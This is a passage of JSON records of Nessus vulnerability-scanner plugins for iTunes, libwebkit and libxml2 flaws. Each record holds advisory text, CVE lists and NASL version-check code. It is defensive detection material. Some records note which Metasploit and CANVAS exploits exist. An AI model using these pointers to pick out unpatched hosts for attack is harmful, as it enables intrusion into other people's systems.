"cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:47:32", "bulletinFamily": "scanner", "description": "The version of Apple iTunes installed on the remote Windows host is\nolder than 10.5. Thus, it is reportedly affected by numerous issues in\nthe following components :\n\n - CoreFoundation\n - ColorSync\n - CoreAudio\n - CoreMedia\n - ImageIO\n - WebKit", "modified": "2019-11-02T00:00:00", "id": "ITUNES_10_5.NASL", "href": "https://www.tenable.com/plugins/nessus/56469", "published": "2011-10-12T00:00:00", "title": "Apple iTunes < 10.5 Multiple Vulnerabilities (credentialed check)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0); # Avoid problems with large number of xrefs.\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(56469);\n script_version(\"1.45\");\n script_cvs_date(\"Date: 2018/11/15 20:50:27\");\n\n script_cve_id(\n \"CVE-2010-1823\",\n \"CVE-2011-0164\",\n \"CVE-2011-0200\",\n \"CVE-2011-0204\",\n \"CVE-2011-0215\",\n \"CVE-2011-0218\",\n \"CVE-2011-0221\",\n \"CVE-2011-0222\",\n \"CVE-2011-0223\",\n \"CVE-2011-0225\",\n \"CVE-2011-0232\",\n \"CVE-2011-0233\",\n \"CVE-2011-0234\",\n \"CVE-2011-0235\",\n \"CVE-2011-0237\",\n \"CVE-2011-0238\",\n \"CVE-2011-0240\",\n \"CVE-2011-0253\",\n \"CVE-2011-0254\",\n \"CVE-2011-0255\",\n \"CVE-2011-0259\",\n \"CVE-2011-0981\",\n \"CVE-2011-0983\",\n \"CVE-2011-1109\",\n \"CVE-2011-1114\",\n \"CVE-2011-1115\",\n \"CVE-2011-1117\",\n \"CVE-2011-1121\",\n \"CVE-2011-1188\",\n \"CVE-2011-1203\",\n \"CVE-2011-1204\",\n \"CVE-2011-1288\",\n \"CVE-2011-1293\",\n \"CVE-2011-1296\",\n \"CVE-2011-1440\",\n \"CVE-2011-1449\",\n \"CVE-2011-1451\",\n \"CVE-2011-1453\",\n \"CVE-2011-1457\",\n \"CVE-2011-1462\",\n \"CVE-2011-1774\",\n \"CVE-2011-1797\",\n \"CVE-2011-2338\",\n \"CVE-2011-2339\",\n \"CVE-2011-2341\",\n \"CVE-2011-2351\",\n \"CVE-2011-2352\",\n \"CVE-2011-2354\",\n \"CVE-2011-2356\",\n \"CVE-2011-2359\",\n \"CVE-2011-2788\",\n \"CVE-2011-2790\",\n \"CVE-2011-2792\",\n \"CVE-2011-2797\",\n \"CVE-2011-2799\",\n \"CVE-2011-2809\",\n \"CVE-2011-2811\",\n \"CVE-2011-2813\",\n \"CVE-2011-2814\",\n \"CVE-2011-2815\",\n \"CVE-2011-2816\",\n \"CVE-2011-2817\",\n \"CVE-2011-2818\",\n \"CVE-2011-2820\",\n \"CVE-2011-2823\",\n \"CVE-2011-2827\",\n \"CVE-2011-2831\",\n \"CVE-2011-3219\",\n \"CVE-2011-3232\",\n \"CVE-2011-3233\",\n \"CVE-2011-3234\",\n \"CVE-2011-3235\",\n \"CVE-2011-3236\",\n \"CVE-2011-3237\",\n \"CVE-2011-3238\",\n \"CVE-2011-3239\",\n \"CVE-2011-3241\",\n \"CVE-2011-3244\",\n \"CVE-2011-3252\"\n );\n script_bugtraq_id(\n 46262,\n 46614,\n 46785,\n 47029,\n 47604,\n 48437,\n 48479,\n 48840,\n 48856,\n 48960,\n 49279,\n 49658,\n 49850,\n 50065,\n 50066,\n 50067,\n 50068\n );\n script_xref(name:\"MSVR\", value:\"MSVR11-001\");\n\n script_name(english:\"Apple iTunes < 10.5 Multiple Vulnerabilities (credentialed check)\");\n script_summary(english:\"Checks version of iTunes on Windows\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote host contains a multimedia application that has multiple\nvulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Apple iTunes installed on the remote Windows host is\nolder than 10.5. Thus, it is reportedly affected by numerous issues in\nthe following components :\n\n - CoreFoundation\n - ColorSync\n - CoreAudio\n - CoreMedia\n - ImageIO\n - WebKit\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-11-303/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-11-304/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT4981\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.apple.com/archives/security-announce/2011/Oct/msg00000.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Apple iTunes 10.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-678\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apple Safari Webkit libxslt Arbitrary File Creation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/10/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"itunes_detect.nasl\");\n script_require_keys(\"SMB/iTunes/Version\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n\nversion = get_kb_item_or_exit(\"SMB/iTunes/Version\");\nfixed_version = \"10.5.0.142\";\n\nif (ver_compare(ver:version, fix:fixed_version) == -1)\n{\n if (report_verbosity > 0)\n {\n path = get_kb_item(\"SMB/iTunes/Path\");\n if (isnull(path)) path = 'n/a';\n\n report =\n '\\n Path : '+path+\n '\\n Installed version : '+version+\n '\\n Fixed version : '+fixed_version+'\\n';\n security_hole(port:get_kb_item(\"SMB/transport\"), extra:report);\n }\n else security_hole(get_kb_item(\"SMB/transport\"));\n}\nelse exit(0, \"The host is not affected since iTunes \"+version+\" is installed.\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:47:32", "bulletinFamily": "scanner", "description": "The version of Apple iTunes on the remote host is prior to version\n10.5. It is, therefore, affected by multiple vulnerabilities in the\nCoreAudio, CoreFoundation, CoreMedia, ColorSync, ImageIO, and WebKit\ncomponents. Note that these only affect iTunes for Windows.", "modified": "2019-11-02T00:00:00", "id": "ITUNES_10_5_BANNER.NASL", "href": "https://www.tenable.com/plugins/nessus/56470", "published": "2011-10-12T00:00:00", "title": "Apple iTunes < 10.5 Multiple Vulnerabilities (uncredentialed check)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0); # Avoid problems with large number of xrefs.\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(56470);\n script_version(\"1.48\");\n script_cvs_date(\"Date: 2018/11/15 20:50:24\");\n\n script_cve_id(\n \"CVE-2010-1823\",\n \"CVE-2011-0164\",\n \"CVE-2011-0200\",\n \"CVE-2011-0204\",\n \"CVE-2011-0215\",\n \"CVE-2011-0218\",\n \"CVE-2011-0221\",\n \"CVE-2011-0222\",\n \"CVE-2011-0223\",\n \"CVE-2011-0225\",\n \"CVE-2011-0232\",\n \"CVE-2011-0233\",\n \"CVE-2011-0234\",\n \"CVE-2011-0235\",\n \"CVE-2011-0237\",\n \"CVE-2011-0238\",\n \"CVE-2011-0240\",\n \"CVE-2011-0253\",\n \"CVE-2011-0254\",\n \"CVE-2011-0255\",\n \"CVE-2011-0259\",\n \"CVE-2011-0981\",\n \"CVE-2011-0983\",\n \"CVE-2011-1109\",\n \"CVE-2011-1114\",\n \"CVE-2011-1115\",\n \"CVE-2011-1117\",\n \"CVE-2011-1121\",\n \"CVE-2011-1188\",\n \"CVE-2011-1203\",\n \"CVE-2011-1204\",\n \"CVE-2011-1288\",\n \"CVE-2011-1293\",\n \"CVE-2011-1296\",\n \"CVE-2011-1440\",\n \"CVE-2011-1449\",\n \"CVE-2011-1451\",\n \"CVE-2011-1453\",\n \"CVE-2011-1457\",\n \"CVE-2011-1462\",\n \"CVE-2011-1774\",\n \"CVE-2011-1797\",\n \"CVE-2011-2338\",\n \"CVE-2011-2339\",\n \"CVE-2011-2341\",\n \"CVE-2011-2351\",\n \"CVE-2011-2352\",\n \"CVE-2011-2354\",\n \"CVE-2011-2356\",\n \"CVE-2011-2359\",\n \"CVE-2011-2788\",\n \"CVE-2011-2790\",\n \"CVE-2011-2792\",\n \"CVE-2011-2797\",\n \"CVE-2011-2799\",\n \"CVE-2011-2809\",\n \"CVE-2011-2811\",\n \"CVE-2011-2813\",\n \"CVE-2011-2814\",\n \"CVE-2011-2815\",\n \"CVE-2011-2816\",\n \"CVE-2011-2817\",\n \"CVE-2011-2818\",\n \"CVE-2011-2820\",\n \"CVE-2011-2823\",\n \"CVE-2011-2827\",\n \"CVE-2011-2831\",\n \"CVE-2011-3219\",\n \"CVE-2011-3232\",\n \"CVE-2011-3233\",\n \"CVE-2011-3234\",\n \"CVE-2011-3235\",\n \"CVE-2011-3236\",\n \"CVE-2011-3237\",\n \"CVE-2011-3238\",\n \"CVE-2011-3239\",\n \"CVE-2011-3241\",\n \"CVE-2011-3244\",\n \"CVE-2011-3252\"\n );\n script_bugtraq_id(\n 46262,\n 46614,\n 46785,\n 47029,\n 47604,\n 48437,\n 48479,\n 48840,\n 48856,\n 48960,\n 49279,\n 49658,\n 49850,\n 50065,\n 50066,\n 50067,\n 50068\n );\n script_xref(name:\"MSVR\", value:\"MSVR11-001\");\n\n script_name(english:\"Apple iTunes < 10.5 Multiple Vulnerabilities (uncredentialed check)\");\n script_summary(english:\"Checks the version of iTunes.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains a multimedia application that has multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes on the remote host is prior to version\n10.5. It is, therefore, affected by multiple vulnerabilities in the\nCoreAudio, CoreFoundation, CoreMedia, ColorSync, ImageIO, and WebKit\ncomponents. Note that these only affect iTunes for Windows.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-11-303/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-11-304/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT4981\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.apple.com/archives/security-announce/2011/Oct/msg00000.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Apple iTunes 10.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-678\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apple Safari Webkit libxslt Arbitrary File Creation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/10/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/10/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_family(english:\"Peer-To-Peer File Sharing\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"itunes_sharing.nasl\");\n script_require_keys(\"iTunes/sharing\");\n script_require_ports(\"Services/www\", 3689);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:3689, embedded:TRUE, ignore_broken:TRUE);\n\nget_kb_item_or_exit(\"iTunes/\" + port + \"/enabled\");\n\ntype = get_kb_item_or_exit(\"iTunes/\" + port + \"/type\");\nsource = get_kb_item_or_exit(\"iTunes/\" + port + \"/source\");\nversion = get_kb_item_or_exit(\"iTunes/\" + port + \"/version\");\n\nif (type != 'Windows') audit(AUDIT_OS_NOT, \"Windows\");\n\nfixed_version = \"10.5\";\n\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n if (report_verbosity > 0)\n {\n report = '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"iTunes\", port, version);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:18:03", "bulletinFamily": "scanner", "description": "This update of libwebkit fixes :\n\n - XSLT file creation allowed webpages evaluating XSLT code\n to create files. (CVE-2011-1774)\n\n - ZDI-11-139 Webkit Anonymous Frame remote code exec", "modified": "2019-11-02T00:00:00", "id": "SUSE_11_LIBWEBKIT-110725.NASL", "href": "https://www.tenable.com/plugins/nessus/55728", "published": "2011-07-29T00:00:00", "title": "SuSE 11.1 Security Update : libwebkit (SAT Patch Number 4917)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(55728);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/10/25 13:36:43\");\n\n script_cve_id(\"CVE-2011-1774\");\n\n script_name(english:\"SuSE 11.1 Security Update : libwebkit (SAT Patch Number 4917)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of libwebkit fixes :\n\n - XSLT file creation allowed webpages evaluating XSLT code\n to create files. (CVE-2011-1774)\n\n - ZDI-11-139 Webkit Anonymous Frame remote code exec\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=688691\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=692619\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-1774.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 4917.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apple Safari Webkit libxslt Arbitrary File Creation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libwebkit-1_0-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libwebkit-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/07/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/07/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 1) audit(AUDIT_OS_NOT, \"SuSE 11.1\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"libwebkit-1_0-2-1.2.7-0.13.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"libwebkit-lang-1.2.7-0.13.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"libwebkit-1_0-2-1.2.7-0.13.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"libwebkit-lang-1.2.7-0.13.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 8.8, "vector": "AV:N/AC:M/Au:N/C:N/I:C/A:C"}}, {"lastseen": "2019-11-01T02:55:10", "bulletinFamily": "scanner", "description": "Multiple vulnerabilities has been discovered and corrected in \nlibxml2 :\n\nOff-by-one error in libxml allows remote attackers to execute\narbitrary code or cause a denial of service (heap-based buffer\noverflow and application crash) via a crafted website CVE-2011-0216).\n\nlibxml2 allows remote attackers to cause a denial of service\n(out-of-bounds read) via unspecified vectors (CVE-2011-3905).\n\nThe updated packages have been patched to correct these issues.", "modified": "2019-11-02T00:00:00", "id": "MANDRIVA_MDVSA-2011-188.NASL", "href": "https://www.tenable.com/plugins/nessus/57320", "published": "2011-12-16T00:00:00", "title": "Mandriva Linux Security Advisory : libxml2 (MDVSA-2011:188)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2011:188. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57320);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/08/02 13:32:54\");\n\n script_cve_id(\"CVE-2011-0216\", \"CVE-2011-3905\");\n script_bugtraq_id(48832);\n script_xref(name:\"MDVSA\", value:\"2011:188\");\n\n script_name(english:\"Mandriva Linux Security Advisory : libxml2 (MDVSA-2011:188)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities has been discovered and corrected in \nlibxml2 :\n\nOff-by-one error in libxml allows remote attackers to execute\narbitrary code or cause a denial of service (heap-based buffer\noverflow and application crash) via a crafted website CVE-2011-0216).\n\nlibxml2 allows remote attackers to cause a denial of service\n(out-of-bounds read) via unspecified vectors (CVE-2011-3905).\n\nThe updated packages have been patched to correct these issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64xml2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64xml2_2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libxml2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libxml2-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libxml2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libxml2_2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2010.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2011\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64xml2-devel-2.7.7-1.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64xml2_2-2.7.7-1.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libxml2-devel-2.7.7-1.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"libxml2-python-2.7.7-1.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"libxml2-utils-2.7.7-1.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libxml2_2-2.7.7-1.5mdv2010.2\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2011\", cpu:\"x86_64\", reference:\"lib64xml2-devel-2.7.8-6.3-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"x86_64\", reference:\"lib64xml2_2-2.7.8-6.3-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"i386\", reference:\"libxml2-devel-2.7.8-6.3-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"libxml2-python-2.7.8-6.3-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"libxml2-utils-2.7.8-6.3-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"i386\", reference:\"libxml2_2-2.7.8-6.3-mdv2011.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T03:14:21", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2012:0016 :\n\nUpdated libxml2 packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe libxml2 library is a development toolbox providing the\nimplementation of various XML standards. One of those standards is the\nXML Path Language (XPath), which is a language for addressing parts of\nan XML document.\n\nA heap-based buffer overflow flaw was found in the way libxml2 decoded\nentity references with long names. A remote attacker could provide a\nspecially crafted XML file that, when opened in an application linked\nagainst libxml2, would cause the application to crash or, potentially,\nexecute arbitrary code with the privileges of the user running the\napplication. (CVE-2011-3919)\n\nAn off-by-one error, leading to a heap-based buffer overflow, was\nfound in the way libxml2 parsed certain XML files. A remote attacker\ncould provide a specially crafted XML file that, when opened in an\napplication linked against libxml2, would cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2011-0216)\n\nA flaw was found in the way libxml2 parsed certain XPath expressions.\nIf an attacker were able to supply a specially crafted XML file to an\napplication using libxml2, as well as an XPath expression for that\napplication to run against the crafted file, it could cause the\napplication to crash. (CVE-2011-2834)\n\nNote: Red Hat does not ship any applications that use libxml2 in a way\nthat would allow the CVE-2011-2834 flaw to be exploited; however,\nthird-party applications may allow XPath expressions to be passed\nwhich could trigger this flaw.\n\nAn out-of-bounds memory read flaw was found in libxml2. A remote\nattacker could provide a specially crafted XML file that, when opened\nin an application linked against libxml2, would cause the application\nto crash. (CVE-2011-3905)\n\nAll users of libxml2 are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. The desktop\nmust be restarted (log out, then log back in) for this update to take\neffect.", "modified": "2019-11-02T00:00:00", "id": "ORACLELINUX_ELSA-2012-0016.NASL", "href": "https://www.tenable.com/plugins/nessus/68428", "published": "2013-07-12T00:00:00", "title": "Oracle Linux 4 : libxml2 (ELSA-2012-0016)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2012:0016 and \n# Oracle Linux Security Advisory ELSA-2012-0016 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68428);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/09/30 10:58:17\");\n\n script_cve_id(\"CVE-2011-0216\", \"CVE-2011-2834\", \"CVE-2011-3905\", \"CVE-2011-3919\");\n script_bugtraq_id(48832, 49658, 51084, 51300);\n script_xref(name:\"RHSA\", value:\"2012:0016\");\n\n script_name(english:\"Oracle Linux 4 : libxml2 (ELSA-2012-0016)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2012:0016 :\n\nUpdated libxml2 packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe libxml2 library is a development toolbox providing the\nimplementation of various XML standards. One of those standards is the\nXML Path Language (XPath), which is a language for addressing parts of\nan XML document.\n\nA heap-based buffer overflow flaw was found in the way libxml2 decoded\nentity references with long names. A remote attacker could provide a\nspecially crafted XML file that, when opened in an application linked\nagainst libxml2, would cause the application to crash or, 